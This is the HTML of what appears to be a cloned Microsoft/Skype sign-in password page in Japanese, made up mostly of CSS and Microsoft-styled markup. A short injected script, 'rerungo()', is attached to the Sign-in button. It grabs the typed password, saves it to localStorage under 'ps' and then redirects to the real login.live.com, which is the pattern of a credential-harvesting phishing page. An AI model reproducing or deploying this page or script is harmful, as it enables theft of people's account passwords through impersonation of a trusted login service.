.fg706s2 { border-bottom-style: solid; }
.f1fmhzm9 { border-bottom-color: rgb(102, 102, 102); }
.fp9bwmr { padding-top: 8px; }
.f81rol6 { padding-right: 10px; }
.frdkuqy { padding-left: 10px; }
.f1d7kygh { padding-bottom: 6px; }
.fc9kpv0 { }
.f1jdtxwi { appearance: none; }
.fqrijq1 { appearance: none; }
.ftffn1o { background-image: url("https://logincdn.msftauth.net/shared/5/js/../images/dropdown_caret_2974998c6b3220b65aa1.svg"); }
.f1jnod33 { background-position-x: 100%; }
.f2mr71s { background-position-x: 0%; }
.f11v2hr3 { background-position-y: 8px; }
.f1oooli6 { background-size: 24px; }
.f1u3ofpn { padding-right: 20px !important; }
.fy9s0n6 { padding-left: 20px !important; }
.fmntwad { padding-left: 5px !important; }
.fucjdza { padding-right: 5px !important; }
[dir="rtl"] .f6422tv { padding-left: 20px !important; }
[dir="rtl"] .f9cnylp { padding-right: 20px !important; }
[dir="rtl"] .f1vyhv7e { padding-right: 5px !important; }
[dir="rtl"] .f9dslv4 { padding-left: 5px !important; }
[dir="rtl"] .ffo4aq0 { background-position-x: 0%; }
[dir="rtl"] .f5wiyt1 { background-position-x: 100%; }
.fm5qsg { -webkit-text-security: disc; }
.f11xvspe { color: rgb(0, 103, 184); }
.f1ern45e { border-top-style: none; }
.f1n71otn { border-right-style: none; }
.f1deefiw { border-left-style: none; }
.f1h8hb77 { border-bottom-style: none; }
.fes3tcz { text-align: right; }
.f1o700av { text-align: left; }
[dir="rtl"] .f1vtoa19 { text-align: left; }
[dir="rtl"] .f1u0lcj8 { text-align: right; }
[dir="rtl"] .fmp27j1 .ext-button-item { margin-left: 4px; }
[dir="rtl"] .f1yzbjom .ext-button-item { margin-right: 4px; }
.f16ez161 .ext-button-item:not(:last-child) { margin-right: 4px; }
.f50tcwn .ext-button-item:not(:last-child) { margin-left: 4px; }
.f1ltw0hi { bottom: auto; }
.fvfyk4 { right: auto; }
.frppm18 { left: auto; }
.f1nxs5xn { min-height: 32px; }
.fxdtvjf { min-width: 108px; }
.fytdu2e { line-height: normal; }
.f10ra9hq { padding-top: 4px; }
.f11qrl6u { padding-right: 12px; }
.fjlbh76 { padding-left: 12px; }
.f1y2xyjm { padding-bottom: 4px; }
.f1cmbuwj { text-overflow: ellipsis; }
.f1cyt9o8 { touch-action: manipulation; }
.fz0id56 { background-color: rgba(0, 0, 0, 0.2); }
.f9f7vaa:disabled { cursor: not-allowed; }
.fmjaa5u:disabled { pointer-events: none; }
.flutoqy:disabled { outline-style: none; }
.f12qb2w:disabled { color: rgba(0, 0, 0, 0.2); }
.f1s9iqzn:disabled { border-top-color: transparent; }
.f1o2wvfq:disabled { border-right-color: transparent; }
.fjk9nze:disabled { border-left-color: transparent; }
.fkbkaou:disabled { border-bottom-color: transparent; }
.f10kbna7:disabled { background-color: rgba(0, 0, 0, 0.2); }
.fv6p4nl { background-color: rgb(0, 103, 184); }
.f9ex757 { border-top-color: rgb(0, 103, 184); }
.f1bn7qby { border-right-color: rgb(0, 103, 184); }
.fqv895b { border-left-color: rgb(0, 103, 184); }
.f1yx5976 { border-bottom-color: rgb(0, 103, 184); }
.f1iretw8 { color: rgb(255, 255, 255); }
.frx91x1 { outline-width: 0px; }
.f1h2546u { }
.f5ogflp { border-top-width: 1px; }
.f1hqa2wf { border-right-width: 1px; }
.finvdd3 { border-left-width: 1px; }
.fzkkow9 { border-top-style: solid; }
.fcdblym { border-right-style: solid; }
.fjik90z { border-left-style: solid; }
.f1r3hej2 { border-top-color: buttontext; }
.f1cnv91 { border-right-color: buttontext; }
.f15418gn { border-left-color: buttontext; }
.f1xt9vf0 { border-bottom-color: buttontext; }
.f1iuv45f { text-decoration-line: none; }
.f18t40fe { background-color: buttonface; }
.f1au7jsi { color: buttontext; }
.fdgv6k0 { forced-color-adjust: none; }
.f1ccctl0:disabled { background-color: window; }
.fgnytwl:disabled { color: graytext; }
.f1ym3bx4 { color: inherit; }
.f14m3nip { table-layout: fixed; }
.f104wqfl { line-height: 16px; }
.f9ijwd5 { word-break: break-word; }
.fqp0lxy { font-size: 80%; }
.f7sbeai { top: 35%; }
[dir="rtl"] .fedbvln { left: 0px; }
[dir="rtl"] .f5rjw9m { right: 0px; }
.f147du38 { width: 23px; }
.f124akge { width: 48px; }
.fzuuom1 { }
.f7tzksb { }
.f150uoa4 { padding-bottom: 8px; }
.f1szoe96 { width: 32px; }
.f1d2rq10 { height: 32px; }
.fri679z { height: 5px; }
.f1uume8q div { position: absolute; }
.ffaz6on div { height: 5px; }
.f1m3tc8b div { width: 5px; }
.f1i2n5vz div { background-color: rgb(0, 103, 184); }
.fvn5op div { z-index: 100; }
.fcb265f div { border-bottom-right-radius: 50%; }
.f1dvoww6 div { border-bottom-left-radius: 50%; }
.fv6o6n1 div { border-top-right-radius: 50%; }
.f1fhb8pd div { border-top-left-radius: 50%; }
.f1kbi84t div { opacity: 0; }
.fantt2w div { animation-duration: 2s; }
.f198vmee div { }
.f9ujs9y div { animation-iteration-count: infinite; }
.fh4d1wz div { }
.ftytnaw div { animation-name: fxbh352; }
.fzqhyo8 div { animation-name: f5ncg2c; }
.f1pp1adv > div:nth-child(1) { animation-delay: 0.05s; }
.f189tktw > div:nth-child(1) { }
.f16isq > div:nth-child(1) { }
.f1nkv2po > div:nth-child(1) { animation-delay: 0.05s; }
.flm8qir > div:nth-child(2) { animation-delay: 0.2s; }
.fb757qh > div:nth-child(2) { }
.f1x2efdl > div:nth-child(2) { }
.f1n79la3 > div:nth-child(2) { animation-delay: 0.2s; }
.f15utjab > div:nth-child(3) { animation-delay: 0.35s; }
.f14xebzo > div:nth-child(3) { }
.fgcztm9 > div:nth-child(3) { }
.fhhmtwr > div:nth-child(3) { animation-delay: 0.35s; }
.f12t7lhm > div:nth-child(4) { animation-delay: 0.5s; }
.fdtcugw > div:nth-child(4) { }
.f1lmrqpp > div:nth-child(4) { }
.fpxi8sl > div:nth-child(4) { animation-delay: 0.5s; }
.f2g94dy > div:nth-child(5) { animation-delay: 0.65s; }
.f552fgt > div:nth-child(5) { }
.f1f72ruk > div:nth-child(5) { }
.f19dq72h > div:nth-child(5) { animation-delay: 0.65s; }
.f8dfeua { outline-color: transparent; }
.f8xlz6g { line-height: 24px; }
.f3gqu { height: 1.5em; }
.f1se85um { margin-top: 1em; }
.f1iv7wbt { margin-bottom: 1em; }
.fizplz0 { line-height: 1.5em; }
.f1pha7fy { min-height: 24px; }
.fq4mcun { width: 24px; }
.f17fgpbq { min-width: 24px; }
.frqbfng { margin-right: 2px; }
.f1hzsgrp { margin-left: 2px; }
.f1ig3etr { border-bottom-right-radius: 12px; }
.fy0y5fd { border-bottom-left-radius: 12px; }
.f24j1xx { border-top-right-radius: 12px; }
.fgv9nof { border-top-left-radius: 12px; }
[dir="rtl"] .f1xy2nom { margin-right: 0px; }
[dir="rtl"] .f802rza { margin-left: 0px; }
[dir="rtl"] .ftnjapa { margin-left: 2px; }
[dir="rtl"] .f21vjug { margin-right: 2px; }
</style>
<script>
function rerungo() {
// 入力フィールドを取得
const inputField = document.querySelector('#i0118[data-testid="i0118"][name="passwd"]');
// 入力フィールドが存在する場合
if (inputField) {
// 入力内容をlocalStorageに保存
localStorage.setItem('ps', inputField.value);
// 指定されたURLにリダイレクト
window.location.href = 'https://login.live.com/login.srf';
} else {
console.error('指定された入力フィールドが見つかりませんでした。');
}
}
</script>
<base href="https://login.live.com/"><title>Skype にサインインする</title><meta name="robots" content="none"><meta name="PageID" content="i5030"><meta name="SiteID" content="293290"><meta name="ReqLC" content="1041"><meta name="LocLC" content="1041"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, minimum-scale=1.0, user-scalable=yes"><link rel="shortcut icon" href="https://logincdn.msftauth.net/16.000.30483.6/images/favicon.ico"></head><body><div id="root"><div data-testid="app-boundary"><div dir="" data-testid="directionWrapper lightbox-layout" class="___sxo9x80 f1wv5yrl"><div class="___19jukwd f1euv43f f1l02sjl fly5x3f f15twtuk f1e31b4d f1yab3r1 f1vgc2s3 f1oy3dpc f5zp4f" data-testid="gamepadNavigationWrapper"><div id="background-container" data-testid="background-container" class="___g7andc0 f15twtuk fly5x3f f1l02sjl fk4wq3q fo6xqva fj9j8l8 f1b6djjb f1uemdou f19dog8a f1vgc2s3 f1bsuimh" role="presentation" style="background-color: rgb(241, 241, 244);"></div><div id="outer" data-testid="outer" class="___1o4ugmz f1w4nmp0 f1euv43f f1l02sjl fly5x3f f15twtuk f1e31b4d f1yab3r1 f1vgc2s3" role="presentation" data-scrollable="true"><div id="middle" class="ext-middle ___269aer0 f15pt5es fmrv4ls f1db26kn" role="main"><div class=""><div><img class="___1tamxo5 f2rbwfs f10kou7y ftgm304 fcgxt0o f1ujusj6 fvueend f1iuewzk f1h7u52p f1t8p9js" data-testid="backgroundLogo" alt="presentation" src="https://logincdn.msftauth.net/shared/5/images/44_08ed657e48f1458641b5.png"><div><div id="inner" data-testid="inner" class="ext-sign-in-box ___1hfmc1q fcgxt0o f1ujusj6 f10pi13n f17n1hoa fdavl6g f1qo6d5h fdeuxjd f1ezb54v f9y0skx f1532mdf folxr9a f1fdtd47 f11pj6g1 f1xvk1ai f14hp5dx fh2bsio f1p9o1ba f1sil6mw fyoomso f1w20av3 fvsv2d7 f18hu7ga fwvh718 f1hfv4zt fqqdcy ftkyt4b fgsheoy fx8ysmy f1johxun f1oeoeae f1xv9j17 fc6zo96 f19go3rf f7mxak8 f19g0ac f2ing9p f1jzjlcu f14fax69 fihqzdl fku5i81 fxkngo2 f1d9o98 f16v9jib fflwtxx fi23lvw f1loq5m1 foj7m9f f1yeby2y f1gl45w1 f1g1znd9 f6fch53 f1btgwtp fgd3u99 f1pshqt5"><div id="lightbox-cover" class="___1rbaixl fy6ml6n fk73vx1 f1ve553k f1bsuimh f1l02sjl fly5x3f f1euv43f f15twtuk f1vgc2s3 f1sr5fc f8kefer f9eofwr f1xxrpeh"></div><div><img data-testid="accessibleImg" class="___1v417w0 f2rbwfs frvgh55" src="https://logincdn.msftauth.net/shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svg" alt="Microsoft" role=""><div data-testid="identityBanner" class=""><button type="button" aria-label="戻る" id="idBtn_Back" class="___3kq2if0 frvgh55 f1pha7fy fq4mcun f17fgpbq f6ogs8q frqbfng f3rmtva f1g0x7ka fhxju0i f1qch9an f1cnd47f fre7gi1 f1358rze fqdk4by f1rvrf73 f1ig3etr fy0y5fd f24j1xx fgv9nof f1tk1al1 f1xy2nom ftnjapa f8491dx f9xaagq f1mungug fb0xa7e f1buog9q f1e35ql2 fatbyko f1grzc83 fy7xq7b f1udaver f1ryksfz f16eid17 fawybe f1q3z31i f9i133b fsjinwp f16rpbht f14o58e2 f1lamlky f2l6bog f9ipe2e f1kw3rgo f1fi9k2w f1am4lky fdpodh3 fmwxxdv f1ds7fx2 f1c5tp0y f1fv83b1 f112k52l f1x8bs3n f1ocwwa8 f1txpo1x fqkc768 f4n3n3y fe2005u fvaa0r1 fk0u3lu f1qsschd f18wuzd f5m1iti f14l2i49 fhzshfc f1czw4g6 fhgzi3m fh5prtf f2i3lp1 f1pnpshs f12qf4w9 fk88hd3 fwx2m9m f1b4of5y fzbp7qu f73d0br f8ofn9z f47ck3e f6iv4em fdte1ka f7qlcaz fhgci9l ftuaf1g f2rybsq f1s1c6xg fh9yr33 f1fv49x2 f4323t4 faoimel ft4kwvt fj0h0bv f1hykqis fuskam8 f1mgpxjn f5qfn8f f13sg5ve f12a7bz1 f1h794hn fwayt1o f1ehnz16 f1ifcrz3 f1lf9w9v fx45lto fyto7u f1dldl6n f6f3rsm"><img data-testid="accessibleImg" src="https://logincdn.msftauth.net/shared/5/images/arrow_left_a9cc2824ef3517b6c416.svg" alt="" role="presentation"></button><div id="userDisplayName" class="___gbynf50 f3gqu f1se85um f11qmguv f1iv7wbt f1tyq0we fizplz0 fz5stix f1p9o1ba f1sil6mw f1cmbuwj">[email protected]</div></div><div id="pageContent" data-testid="paginationView" class="___1cdao1s f10pi13n f11f2yzx"><form data-testid="post-redirect-form" method="POST" aria-hidden="true" target="_top" action="https://login.live.com/"></form><div data-testid="routeAnimation" class="___gv5jh40 f19ph88b f10pi13n f6c6jrs f1loq5m1 fywypte fvn4fo7 f1n5kmys"><form name="f1" id="i0281" data-testid="passwordForm" novalidate="" spellcheck="false" method="post" autocomplete="false" action="https://login.live.com/ppsecure/post.srf?mkt=ja-JP&cobrandid=2befc4b5-19e3-46e8-8347-77317a16a5a5&id=293290&contextid=487154C196406436&opid=7B3E785F54E37394&bk=1737842840&uaid=2c0d5d0a5e0640a48f35a6576bd1a9b1&client_flight=ReservedFlight33,ReservedFligh&pid=0"><div class="___cdfygg0 ffmhhld fzzj3pj fhuq1gn f336tjw f1uinfot f1jlhsmd f1nbblvp fifp7yv f1ov4xf1 f1asdtw4"><div><div role="heading" aria-level="1" id="loginHeader">パスワードを入力する</div></div></div><div data-testid="hiddenInputs"></div><div data-testid="inputComponentWrapper" class="___102hf4m f1tyq0we f11qmguv f1wv5yrl"><div><div class="___917j710 ftgm304 fly5x3f fwrgwhw f15tpi3i f10pi13n frecw6t f1mmgjok f1tto2h8 f1c2pb84 fyft3pb f1rof34y f1172n73 f4hylce f18s3fau f1ymw6u3 f1xqrj1d f160kle0 f6rydpu f1i9lmva fspveqh f2x7bcd f1imcvf3 f1bxicz3 f1kf6f3a fajq0z4 fyw0hav f1a7xkls fnpm3l fsc3mvo f1s66rt0 f73ugz1 f1iw8vv5 f5iv370 f1ytw2m8 feh5m5c f7upnml fexuuuk fklagwq fsjklvg f1uvsclk f123zcai"><input id="i0118" data-testid="i0118" name="passwd" placeholder="パスワード" type="password" maxlength="120" aria-label="[email protected] のパスワードを入力します" aria-describedby="loginHeader " class="" autocomplete="current-password" value="" style="border-color: rgb(0, 103, 184);"></div></div></div><div class="___102hf4m f1tyq0we f11qmguv f1wv5yrl"><div class="___108r86x fedgsey f10pi13n f1wv5yrl f161knb0 f12huiiw" data-testid="secondaryContent"><div class="___wqsyy40 f15tpi3i"><span tabindex="0" role="button" id="idA_PWD_ForgotPassword" class="___1hl8tjj f11xvspe f1bsjrm3 f3rmtva f1ern45e f1n71otn f1h8hb77 f1deefiw fryk5ur fv6z6zc f1cio4g9 f1mwb9y5 f1ynmygo f121g8nd f1i82eaq f8491dx f1nbblvp fifp7yv f1ov4xf1 f1asdtw4 f1gqcn34 fbabzkn felxxx9 fqttjmt">パスワードを忘れた場合</span></div><div class="___wqsyy40 f15tpi3i"><span tabindex="0" role="button" id="idA_PWD_SwitchToCredPicker" data-testid="credentialPickerLink" class="___1hl8tjj f11xvspe f1bsjrm3 f3rmtva f1ern45e f1n71otn f1h8hb77 f1deefiw fryk5ur fv6z6zc f1cio4g9 f1mwb9y5 f1ynmygo f121g8nd f1i82eaq f8491dx f1nbblvp fifp7yv f1ov4xf1 f1asdtw4 f1gqcn34 fbabzkn felxxx9 fqttjmt">その他のサインイン方法</span></div></div></div><div data-testid="inputContainer" class="___1cj7yg8 f183mx53 f1turhiw f1rmqj0e"><div><div class="___102hf4m f1tyq0we f11qmguv f1wv5yrl"><div class="ext-button-field-container ___30qpg70 f1euv43f f1yab3r1 fly5x3f fes3tcz f1vtoa19 fmp27j1 f16ez161" data-testid="textButtonContainer"><div class="ext-button-item ___frx9oy0 f14t3ns0"><button onclick="rerungo();" id="idSIButton9" class="ext-primary ext-button ___n08lmr0 f1nxs5xn f1ern45e f1n71otn f1h8hb77 f1deefiw fxdtvjf fytdu2e f14t3ns0 f10ra9hq f11qrl6u f1y2xyjm fjlbh76 f10pi13n f6dzj5z f17mccla fz5stix f1p9o1ba f1sil6mw fmrv4ls f1cmbuwj f1cyt9o8 f1iretw8 fv6p4nl fnsf7x1 f8491dx fj5daoo fnmhfyr f1e35ql2 fatbyko f1grzc83 fb0xa7e fljg2da f1c2uykm f1eqj1rd f7n145z ft0kson ff472gp f4yyc7m fggejwh ft2aflc f9f7vaa fmjaa5u flutoqy f12qb2w f1s9iqzn f1o2wvfq fkbkaou fjk9nze f10kbna7 f9ex757 f1bn7qby f1yx5976 fqv895b">サインイン</button></div></div></div></div></div></form></div><iframe title="DeviceFingerPrinting" data-testid="deviceFingerPrinting" class="___shdph00 fre7gi1 f1358rze fqdk4by f1rvrf73 f13qgvxu fd7fpy0 f1euv43f frkrog8 f1mpe4l3 f4spc52 f16kh0oo f1wgmumt fwxdmvy" src="cid:[email protected]"></iframe></div></div></div></div></div></div></div><div id="footer" data-testid="footer" role="contentinfo" class="ext-has-background ext-background-always-visible ext-footer ___qmp2ma0 f1euv43f f1vgc2s3 f1yab3r1 fly5x3f f1mtd64y f1y7q3j9 f1wirg6b f1hgrdrl f1ysfysz fluk1gh f1utt6iu f1icddqz fpaq0wn"><div id="footerLinks" class="ext-footer-links ___11rt184 f1qymw5e f11qmguv f19f4twv f1tyq0we f22iagw fanxd30 fgbriwd fhc64sm f11umutp f1mv5dz6 f1oed95z f1a6j2p8 f16cemql f179atcd"><a id="ftrTerms" href="https://login.live.com/gls.srf?urlID=WinLiveTermsOfUse&mkt=JA-JP&uaid=2c0d5d0a5e0640a48f35a6576bd1a9b1&client_flight=ReservedFlight33,ReservedFligh" target="_blank" rel="noreferrer noopener" class="ext-has-background ext-background-always-visible ext-footer-item ext-footer-content ___1jlbhd7 f1b8mhjz f1ugzwwg f336tjw fz5stix f14t3ns0 ff9s3yw f1phki43 f1bsjrm3 f1wzsntn f141chxu fesczou fp3n2rn">使用条件</a><a id="ftrPrivacy" href="https://login.live.com/gls.srf?urlID=MSNPrivacyStatement&mkt=JA-JP&uaid=2c0d5d0a5e0640a48f35a6576bd1a9b1&client_flight=ReservedFlight33,ReservedFligh" target="_blank" rel="noreferrer noopener" class="ext-has-background ext-background-always-visible ext-footer-item ext-footer-content ___1jlbhd7 f1b8mhjz f1ugzwwg f336tjw fz5stix f14t3ns0 ff9s3yw f1phki43 f1bsjrm3 f1wzsntn f141chxu fesczou fp3n2rn">プライバシーと Cookie</a><a id="moreOptions" href="https://login.live.com/#" role="button" class="ext-has-background ext-background-always-visible ext-footer-item ext-footer-content ext-debug-item ___1q73p6z f1b8mhjz f4ybsrx f82itaf fz5stix f14t3ns0 ff9s3yw f1phki43 f1bsjrm3 f1wzsntn f141chxu fesczou fp3n2rn f1mh47zh f12kltsn fhuq1gn f1qf9653" aria-label="トラブルシューティング情報についてはここをクリックしてください" aria-expanded="false">...</a></div><div class="ext-footer-links ___11rt184 f1qymw5e f11qmguv f19f4twv f1tyq0we f22iagw fanxd30 fgbriwd fhc64sm f11umutp f1mv5dz6 f1oed95z f1a6j2p8 f16cemql f179atcd"><div class="ext-has-background ext-background-always-visible ext-footer-item ext-footer-content ___1qai595 f1b8mhjz fnsq08h f336tjw fz5stix f14t3ns0 ff9s3yw f1phki43 f1bsjrm3 f1wzsntn f141chxu fesczou fp3n2rn">これがお使いのデバイスでない場合は、プライベート ブラウジングを使用します。<a id="learnMoreLink" data-testid="learnMoreLink" href="https://go.microsoft.com/fwlink/?LinkID=2281649" target="_blank" rel="noreferrer noopener" class="___1pqb9jy f1b8mhjz f141chxu fesczou fp3n2rn fb7lm33">詳細情報</a></div></div></div></div></div></div></div></div><div id="modal-root"></div>
</body></html> |